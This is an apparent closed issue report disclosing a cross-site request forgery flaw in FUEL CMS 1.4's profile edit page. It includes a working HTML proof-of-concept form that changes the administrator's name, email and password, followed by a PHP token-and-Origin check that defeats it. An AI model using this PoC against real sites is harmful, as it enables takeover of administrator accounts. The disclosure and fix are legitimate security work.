Closed
Description
Cross-site request forgery (CSRF) vulnerability in "http://127.0.0.1/fuel/my_profile/edit?inline=" in FUELCMS 1.4 allows remote attackers to hijack the authentication of unspecified users for requests that change the administrator's password.
Author: xichaokm
PoC:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>CSRF</title>
</head>
<body>
<form action="http://127.0.0.1/fuel/my_profile/edit?inline=" method="POST">
<input type="hidden" name="user_name" value="hacker"><!--admin's name-->
<input type="hidden" name="email" value="test@mail.com"><!--admin's email-->
<input type="hidden" name="first_name" value="admin">
<input type="hidden" name="last_name" value="admin">
<input type="hidden" name="new_password" value="xichao"><!--admin's password-->
<input type="hidden" name="confirm_password" value="xichao"><!--admin's password-->
<input type="hidden" name="Save" value="Save">
<input type="hidden" name="language" value="english">
<input type="hidden" name="fuel_inline" value="0">
<button type="submit" value="Submit">GO</button>
</form>
</body>
</html>
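The form above is accepted because nothing in the request proves it came from a page the application itself rendered. The following is an added example, not part of the original report and not FUEL CMS code: a synchronizer-token check for a state-changing POST such as the profile edit. The function names, the `csrf_token` field name and the sample requests are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical helpers (not FUEL CMS code): synchronizer-token CSRF check
// for a state-changing POST such as the profile edit form.

/** Return the per-session token, creating it on first use. */
function csrf_issue_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

/** True only if the request carries the session's token and a same-site Origin. */
function csrf_request_is_valid(array $session, array $post, array $server, string $expectedOrigin): bool
{
    // Reject cross-site origins when the browser sends the header.
    $origin = $server['HTTP_ORIGIN'] ?? null;
    if ($origin !== null && $origin !== $expectedOrigin) {
        return false;
    }
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    if (!is_string($expected) || !is_string($supplied) || $expected === '') {
        return false;
    }
    // Constant-time comparison avoids leaking the token through timing.
    return hash_equals($expected, $supplied);
}

// Constructed requests: the session belongs to a logged-in administrator.
$session = [];
$token   = csrf_issue_token($session);
$origin  = 'http://127.0.0.1';

// Legitimate form: rendered by the application, so it includes the token.
$legit = ['new_password' => 'example', 'confirm_password' => 'example', 'csrf_token' => $token];
// Forged form: same kind of fields as the PoC, but a third-party page cannot read the token.
$forged = ['new_password' => 'example', 'confirm_password' => 'example'];

var_dump(csrf_request_is_valid($session, $legit, ['HTTP_ORIGIN' => $origin], $origin));
var_dump(csrf_request_is_valid($session, $forged, ['HTTP_ORIGIN' => 'http://attacker.example'], $origin));
var_dump(csrf_request_is_valid($session, $forged, [], $origin));
```

Only the first request passes; the forged ones fail on the Origin check or on the missing token, so the password change is never processed.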